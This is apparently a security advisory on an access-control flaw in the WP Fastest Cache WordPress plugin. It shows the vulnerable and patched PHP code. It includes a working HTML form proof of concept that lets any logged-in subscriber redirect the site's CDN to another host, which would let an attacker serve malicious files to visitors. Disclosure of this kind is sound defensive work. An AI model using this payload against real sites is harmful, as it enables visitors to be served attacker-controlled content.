Protecting You Against Wordfence’s Bad Practices: Unauthorized Options Update Vulnerability in WP Fastest Cache
Wordfence is putting WordPress website at risk by disclosing vulnerabilities in plugins with critical details needed to double check their work missing, in what appears to be an attempt to profit off of these vulnerabilities. We are releasing those details so that others can review the vulnerabilities to try to limit the damage Wordfence’s practice could cause.
Wordfence describes the vulnerability in WP Fastest Cache version 0.8.5.7 as “The Options Update vulnerability allows an attacker to access and make changes to the CDN (Content Delivery Network) options for the website. With this control an attacker can direct all requests for css files, images, videos, etc. to their site, allowing them to serve malicious content to visitors of the vulnerable site.”
The relevant change in the next version was to restrict the AJAX accessible function wpfc_save_cdn_integration_ajax_request_callback() to Administrator level users in the file /wpFastestCache.php .
Code in 0.8.5.7:
335 336 337 338 339 340 341 342 343 344 | public function wpfc_save_cdn_integration_ajax_request_callback(){ $values = json_encode($_POST["values"]); if(get_option("WpFastestCacheCDN")){ update_option("WpFastestCacheCDN", $values); }else{ add_option("WpFastestCacheCDN", $values, null, "yes"); } echo json_encode(array("success" => true)); exit; } |
Code in 0.8.5.8:
348 349 350 351 352 353 354 355 356 357 358 359 360 361 | public function wpfc_save_cdn_integration_ajax_request_callback(){ if(current_user_can('manage_options')){ $values = json_encode($_POST["values"]); if(get_option("WpFastestCacheCDN")){ update_option("WpFastestCacheCDN", $values); }else{ add_option("WpFastestCacheCDN", $values, null, "yes"); } echo json_encode(array("success" => true)); exit; }else{ wp_die("Must be admin"); } } |
Wordfence’s description notably doesn’t mention that the attacker needs to be logged in to WordPress to exploit this, which severely limits the severity of the vulnerability.
Proof of Concept
The following proof of concept will set the CDN URL to example.com.
Make sure you are logged in to WordPress, ideally as a subscriber since they have the least capabilities. Also, make sure to replace “[path to WordPress]” with the location of WordPress
<html> <body> <form action="http://[path to WordPress]/wp-admin/admin-ajax.php"; method="POST"> <input type="hidden" name="action" value="wpfc_save_cdn_integration_ajax_request" /> <input type="hidden" name="values[success]" value="false" /> <input type="hidden" name="values[id]" value="other" /> <input type="hidden" name="values[cdnurl]" value="example.com" /> <input type="hidden" name="values[originurl]" value="" /> <input type="hidden" name="values[file_types]" value="css,js,gif,png,jpg,jpeg,ttf,otf,woff,less,mp4,svg,eot" /> <input type="hidden" name="file_types" value="css,js,gif,png,jpg,jpeg,ttf,otf,woff,less,mp4,svg,eot" /> <input type="submit" value="Submit" /> </form> </body> </html>